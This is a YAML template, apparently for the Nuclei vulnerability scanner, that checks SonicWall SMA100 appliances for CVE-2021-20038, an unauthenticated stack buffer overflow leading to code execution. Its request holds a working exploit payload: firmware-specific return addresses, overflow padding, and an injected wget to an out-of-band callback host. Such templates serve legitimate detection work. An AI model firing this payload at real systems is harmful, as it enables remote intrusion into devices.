42 lines
1.4 KiB
YAML
42 lines
1.4 KiB
YAML
id: CVE-2021-20038
|
|
|
|
info:
|
|
name: SonicWall SMA100 Stack BoF to Unauthenticated RCE
|
|
author: dwisiswant0, jbaines-r7
|
|
severity: critical
|
|
description: |
|
|
A Stack-based buffer overflow vulnerability in SMA100
|
|
Apache httpd server's mod_cgi module environment variables
|
|
allows a remote unauthenticated attacker to potentially
|
|
execute code as a 'nobody' user in the appliance.
|
|
This vulnerability affected SMA 200, 210, 400, 410 and 500v
|
|
appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv,
|
|
10.2.1.2-24sv and earlier versions.
|
|
reference:
|
|
- https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis
|
|
tags: cve,cve2021,overflow,rce,sonicwall
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.80
|
|
cve-id: CVE-2021-20038
|
|
cwe-id: CWE-787
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
GET /{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};{{prefix_addr}}{{system_addr}};{wget,http://{{interactsh-url}}};?{{repeat("A", 518)}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
attack: clusterbomb
|
|
payloads:
|
|
prefix_addr:
|
|
- "%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf" # stack's top address
|
|
system_addr:
|
|
- "%08%b7%06%08" # for 10.2.1.2-24sv
|
|
- "%64%b8%06%08" # for 10.2.1.1-1[79]sv
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http" |